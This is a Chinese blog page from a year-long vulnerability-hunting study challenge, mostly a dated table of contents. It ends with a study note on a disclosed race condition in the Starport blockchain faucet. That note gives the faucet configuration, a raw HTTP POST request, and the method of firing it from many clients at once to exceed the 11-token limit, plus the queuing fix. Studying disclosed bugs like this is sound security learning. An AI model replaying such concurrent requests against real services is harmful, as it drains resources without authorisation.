漏洞挖掘365天挑战

时间: 2022.1.1——2023.1.1

每天两小时,每日更新

此挑战的主页: 漏洞挖掘365天挑战

有人加我,那就建个群吧。如果过期了,加我微信pxiaoer2025。

目录:

1月

第一周

第二周

第三周

第四周

2月

第一周

第二周

第三周

第四周

3月

第一周

第二周

第三周

第四周

第五周

4月

第一周

  • Day091: 4.1
  • Day092:4.2
  • Day093:4.3

第二周

  • Day094:4.4
  • Day095:4.5
  • Day096:4.6
  • Day097:4.7
  • Day098:4.8
  • Day099:4.9
  • Day100:4.10

第三周

  • Day101:4.11
  • Day102:4.12
  • Day103:4.13
  • Day104:4.14
  • Day105:4.15
  • Day106:4.16
  • Day107:4.17

第四周

  • Day108:4.18
  • Day109:4.19
  • Day110:4.20
  • Day111:4.21
  • Day112:4.22
  • Day113:4.23
  • Day114:4.24

第五周

  • Day115:4.25
  • Day116:4.26
  • Day117:4.27
  • Day118:4.28
  • Day119:4.29
  • Day120:4.30

5月

第一周

第二周

  • Day129: 5.9
  • Day130: 5.10
  • Day131: 5.11
  • Day132: 5.12
  • Day133: 5.13
  • Day134: 5.14
  • Day135: 5.15

第三周

  • Day136: 5.16
  • Day137: 5.17
  • Day138: 5.18
  • Day139: 5.19
  • Day140: 5.20
  • Day141: 5.21
  • Day142: 5.22

第四周

  • Day143: 5.23
  • Day144: 5.24
  • Day145: 5.25
  • Day146: 5.26
  • Day147: 5.27
  • Day148: 5.28
  • Day149: 5.29
  • Day150: 5.30
  • Day151: 5.31

6月

第一周

  • Day152: 6.1
  • Day153: 6.2
  • Day154: 6.3
  • Day155: 6.4
  • Day156: 6.5

第二周

  • Day156: 6.6
  • Day157: 6.7
  • Day158: 6.8
  • Day159: 6.9
  • Day160: 6.10
  • Day161: 6.11
  • Day162: 6.12

第三周

  • Day163: 6.13
  • Day164: 6.14
  • Day165: 6.15
  • Day166: 6.16
  • Day167: 6.17
  • Day168: 6.18
  • Day169: 6.19

第四周

  • Day170: 6.20
  • Day171: 6.21
  • Day172: 6.22
  • Day173: 6.23
  • Day174: 6.24
  • Day175: 6.25
  • Day176: 6.26

第五周

  • Day177: 6.27
  • Day178: 6.28
  • Day179: 6.29
  • Day180: 6.30

7月

第一周

  • Day181: 7.1
  • Day182: 7.2
  • Day183: 7.3
  • Day184: 7.4
  • Day185: 7.5
  • Day186: 7.6
  • Day187: 7.7
  • Day188: 7.8
  • Day189: 7.9
  • Day190: 7.10

第二周

  • Day191: 7.11
  • Day192: 7.12
  • Day193: 7.13
  • Day194: 7.14
  • Day195: 7.15
  • Day196: 7.16
  • Day197: 7.17

第三周

  • Day198: 7.18
  • Day199: 7.19
  • Day200: 7.20
  • Day201: 7.21
  • Day202: 7.22
  • Day203: 7.23
  • Day204: 7.24

第四周

  • Day205: 7.25
  • Day206: 7.26
  • Day207: 7.27
  • Day208: 7.28
  • Day209: 7.29
  • Day210: 7.30
  • Day211: 7.31

8月

第一周

  • Day212: 8.1
  • Day213: 8.2
  • Day214: 8.3
  • Day215: 8.4
  • Day216: 8.5
  • Day217: 8.6
  • Day218: 8.7

第二周

  • Day219: 8.8
  • Day220: 8.9
  • Day221: 8.10
  • Day222: 8.11
  • Day223: 8.12
  • Day224: 8.13
  • Day225: 8.14

第三周

  • Day226: 8.15
  • Day227: 8.16
  • Day228: 8.17
  • Day229: 8.18
  • Day230: 8.19
  • Day231: 8.20
  • Day232: 8.21

第四周

  • Day233: 8.22
  • Day234: 8.23
  • Day235: 8.24
  • Day236: 8.25
  • Day237: 8.26
  • Day238: 8.27
  • Day239: 8.28

第五周

  • Day240: 8.29
  • Day241: 8.30
  • Day242: 8.31

9月

第一周

  • Day243: 9.1
  • Day244: 9.2
  • Day245: 9.3
  • Day246: 9.4

第二周

  • Day247: 9.5
  • Day248: 9.6
  • Day249: 9.7
  • Day250: 9.9
  • Day251: 9.9
  • Day252: 9.10
  • Day253: 9.11

第四周

  • Day254: 9.12
  • Day255: 9.13
  • Day256: 9.14
  • Day258: 9.15
  • Day259: 9.16
  • Day260: 9.17
  • Day261: 9.18

第五周

  • Day262: 9.19
  • Day263: 9.20
  • Day264: 9.21
  • Day265: 9.22
  • Day266: 9.23
  • Day267: 9.24
  • Day268: 9.25

第六周

  • Day269: 9.26
  • Day270: 9.27
  • Day271: 9.28
  • Day272: 9.29
  • Day273: 9.30

10月

第一周

  • Day274: 10.1
  • Day275: 10.2
  • Day276: 10.3
  • Day277: 10.4
  • Day278: 10.5
  • Day279: 10.6
  • Day280: 10.7
  • Day281: 10.8
  • Day282: 10.9

第二周

  • Day283: 10.10
  • Day284: 10.11
  • Day285: 10.12
  • Day286: 10.13
  • Day287: 10.14
  • Day288: 10.15
  • Day289: 10.16

第三周

  • Day290: 10.17
  • Day291: 10.18
  • Day292: 10.19
  • Day293: 10.20
  • Day294: 10.21
  • Day295: 10.22
  • Day296: 10.23

第四周

  • Day297: 10.24
  • Day298: 10.25
  • Day299: 10.26
  • Day300: 10.27
  • Day301: 10.28
  • Day302: 10.29
  • Day303: 10.30
  • Day304: 10.31

11月

第一周

漏洞学习之Race condition in faucet when using starport

链接:https://hackerone.com/reports/1438052

详细: https://blog.credshields.com/race-condition-in-tendermints-starport-7cebe176d935

accounts:
  - name: alice
    coins: ["0token", "200000000stake"]
  - name: bob
    coins: ["500token", "100000000stake"]
validator:
  name: alice
  staked: "100000000stake"
client:
  openapi:
    path: "docs/static/openapi.yml"
  vuex:
    path: "vue/src/store"
faucet:
  name: bob
  coins: ["5token", "100000stake"]  
  coins_max: ["11token", "100000stake"]

这里有一个配置,配置了coins_max 最大可以取11个token,但是呢,可以利用多线程来引发竞争条件

POST / HTTP/1.1
Host: 172.105.41.242:4500
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.105.41.242:4500/
Content-Type: application/json
Origin: http://172.105.41.242:4500
Content-Length: 63
Connection: close
{
  "address": "ALICE_ADDRESS"
}


同时利用多个client去访问

发现可以取到30个token

主要修复的点,其实就是放在队列里面去请求。而且这个项目,代码是开源的,这种情况是可以去审计的。